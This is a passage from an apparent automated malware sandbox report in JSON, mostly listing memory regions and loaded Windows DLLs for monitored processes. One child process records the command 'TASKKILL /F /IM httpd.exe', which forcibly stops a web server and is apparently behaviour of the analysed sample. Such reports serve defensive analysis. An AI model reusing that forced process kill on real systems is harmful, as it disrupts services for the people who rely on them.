dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2846", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:24.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_2847", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:24.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 35717119, "entry_point": 0, "filename": null, "id": "region_2848", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:01:24.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35717120, "type": "region", "version": 1 }, "end_va": 35979263, "entry_point": 0, "filename": null, "id": "region_2849", "name": "private_0x0000000002210000", "norm_filename": null, "region_type": "private_memory", "start_va": 35717120, "timestamp": "00:01:24.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36831232, "type": "region", "version": 1 }, "end_va": 37093375, "entry_point": 0, "filename": null, "id": "region_2850", "name": "private_0x0000000002320000", "norm_filename": null, "region_type": "private_memory", "start_va": 36831232, "timestamp": "00:01:24.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2851", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:24.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2852", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:24.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2853", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:24.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1785921536, "type": "region", "version": 1 }, "end_va": 1786019839, "entry_point": 1785926453, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2854", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1785921536, "timestamp": "00:01:24.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1786052608, "type": "region", "version": 1 }, "end_va": 1786667007, "entry_point": 1786181817, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2855", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1786052608, "timestamp": "00:01:24.261", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM httpd.exe /IM httpd.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_21", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 21, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2856", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:24.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2857", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:24.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2858", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:24.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_2859", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:24.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_2860", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:01:24.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_2861", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:01:24.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_2862", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:24.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 10510335, "entry_point": 10443913, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2863", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 10420224, "timestamp": "00:01:24.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2864", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:24.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2865", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:24.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2866", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2867", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2868", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2869", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2870", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2871", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2872", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:24.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_2873", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:24.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2874", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:24.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2875", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:24.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2876", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:24.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2877", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:24.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2878", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:24.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2879", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:24.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2880", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:24.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1142783, "entry_point": 720896, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2881", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 720896, "timestamp": "00:01:24.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_2882", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:24.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5570559, "entry_point": 0, "filename": null, "id": "region_2883", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:01:24.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2884", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:24.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788628991, "entry_point": 1788416981, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2885", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:24.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788735487, "entry_point": 1788678817, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2886", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:24.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788739584, "type": "region", "version": 1 }, "end_va": 1788809215, "entry_point": 1788744448, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2887", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788739584, "timestamp": "00:01:24.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1788870656, "type": "region", "version": 1 }, "end_va": 1788923903, "entry_point": 1788875232, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2888", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788870656, "timestamp": "00:01:24.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2889", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:24.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2890", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:24.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2891", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:24.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2892", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:24.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2893", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:24.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2894", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:24.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2895", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:24.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2896", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:24.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2897", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:24.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2898", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:24.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2899", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:24.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2900", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:24.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2901", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:24.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2902", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:24.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2903", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:24.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2904", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:24.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2905", "name": "ole32.dll", "norm_filename": 